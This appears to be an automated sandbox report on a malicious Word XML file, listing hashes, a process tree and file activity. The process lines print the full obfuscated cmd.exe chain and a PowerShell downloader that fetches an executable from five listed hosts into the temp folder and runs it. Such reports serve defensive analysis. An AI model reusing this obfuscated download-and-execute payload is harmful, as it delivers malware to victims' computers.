File name:	0478911415250.doc
Full analysis:	https://app.any.run/tasks/01d58134-e36c-406e-8bea-24d104894737
Verdict:	Malicious activity
Analysis date:	January 22, 2019, 11:58:30
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	0E1215AED06333D0329F17D9F9ACB259
SHA1:	3B980D33D286C421489B01674E1CDCA72A3E9A73
SHA256:	B97D4CF1B9BCBBC27F547EEAD8201A7120F5398F9BA4483ECB4A9F6CB990B300
SSDEEP:	3072:N+IOQsgzH0VbS4ORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6AlgyL:NLOqH0VGRkeyKHHlf3bwwc3Yxqr

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

PID	CMD	Path	Indicators	Parent process
3056	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0478911415250.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3488	c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!\|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^\|findstr llCm')DO %Q "	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4044	CmD /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!\|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^\|findstr llCm')DO %Q "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3628	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $o8292='z5512';$j1555=new-object Net.WebClient;$q5340='http://afordioretails.com/Khp3xNuXqRmrbdu@http://drapart.org/FqGR6B9HwLT_OooI9s@http://allopizzanuit.fr/1DIR7Hub_v0@http://www.apresearch.in/ztesjGJ4KKy_CxNxxH@http://sarahleighroddis.com/AVjjaUAheLfH361x_jvv'.Split('@');$m5383='r1972';$z3585 = '883';$t9777='p9902';$i7560=$env:temp+'\'+$z3585+'.exe';foreach($j8750 in $q5340){try{$j1555.DownloadFile($j8750, $i7560);$b714='u3975';If ((Get-Item $i7560).length -ge 40000) {Invoke-Item $i7560;$w1556='k6056';break;}}catch{}}$o770='q8506';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3696	C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=AlED tokens=3" %Q IN ('assoc^\|findstr llCm') DO %Q "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2140	C:\Windows\system32\cmd.exe /c assoc\|findstr llCm	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2332	C:\Windows\system32\cmd.exe /S /D /c" assoc"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2428	findstr llCm	C:\Windows\system32\findstr.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID	Process	Filename		Type
3056	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR6840.tmp.cvr		—
		MD5:—	SHA256:—
3056	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B40D03.jpg		—
		MD5:—	SHA256:—
3056	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0478911415250.doc.LNK		lnk
		MD5:65ABBFCE4282E080181D2D38E07DDB58	SHA256:DFC7BB53ADE7DDB0F3828E993FF2FF90CE958206B748A9925B540097799DEF33
3056	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:816D838DD39EF23A0CF3FE55EF9E2410	SHA256:D2D0C33DA810AD744CA4A599FDCF4BF27E42D4F20D1FBE7C349EBF75E254AB87
3056	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:9C5088C4C8578649BD2576738844C5EB	SHA256:68D8939116B80D323B03257325325049C470DF486D16CDB599985542D9416D5F
3056	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:2835914C447C507C61A37057AB92E8AE	SHA256:70AE687D376C8970A22424EB8B72EA729101C95DAE341C7A0CD6D1DEA53393AF
3056	WINWORD.EXE	C:\Users\admin\Desktop\~$78911415250.doc		pgc
		MD5:ECF3FA492E3BA546667415EADD970A48	SHA256:70CE04E3C8B54F3D6BBBC344F550246C2725C128465BD657E5EFBCDDD5943F91

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:597.75pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 214874 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	004B252C
WordDocumentBodySectPRsidRDefault:	00A22A26
WordDocumentBodySectPRsidR:	005E6EE1
WordDocumentDocPrRsidsRsidVal:	005A24B1
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1

General Info

0478911415250.doc

0E1215AED06333D0329F17D9F9ACB259

3B980D33D286C421489B01674E1CDCA72A3E9A73

B97D4CF1B9BCBBC27F547EEAD8201A7120F5398F9BA4483ECB4A9F6CB990B300

3072:N+IOQsgzH0VbS4ORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6AlgyL:NLOqH0VGRkeyKHHlf3bwwc3Yxqr

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

SUSPICIOUS

Starts CMD.EXE for commands execution

Application launched itself

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings